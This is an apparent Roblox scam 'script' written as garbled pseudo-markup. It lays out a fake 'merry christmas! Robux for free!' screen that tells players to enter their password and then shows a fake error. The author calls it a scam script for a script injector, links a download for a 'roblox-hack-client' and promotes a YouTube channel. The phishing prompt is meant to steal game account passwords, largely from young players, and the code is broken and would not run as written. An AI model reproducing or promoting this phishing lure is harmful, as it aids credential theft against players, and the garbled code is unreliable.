dnbr>pasterobuxadmpanel
                     title:merry christmas! Robux for free!
      desc:>Just log in and leave the game and you will recieve the following reward of ?:icon=robux>500,000,000<
descaddon>P.S. we already have your username, so all you need is your password!
            >(not a scam)<subtitle
                           
               ,sentence1>insertplayerusername
               ,sentence2>(curvyrectangle>Please enter password<
  <d2>Claim your free robux! (recieve promocode)
         
      <newpage>errormessage?=Oops! Something went wrong while logging you in and getting your code! But here is a free code to get 100M+ Robux! Sorry, have a good day!
    loginstax1?=playerdeatails?=username:insert>password:insert
            
                                   dont copy this!
THIS IS A ROBLOX SCAM SCRIPT FOR A HACK GUI! FOR A SCRIPT INJECTOR TO MAKE EVERYONE SEE THIS SRIPT ON THEIR SCREEN BUT YOU
download this----> https://mediafire.com/download/roblox-hack-client20%

Made by SYLJ Exploitzz, Subscribe for a premium scam menu! And premium of all my hacks!
yT:https://youtube.com/Kienao/SYLJ Exploitzz

           




                                          THANK YOU!!!!!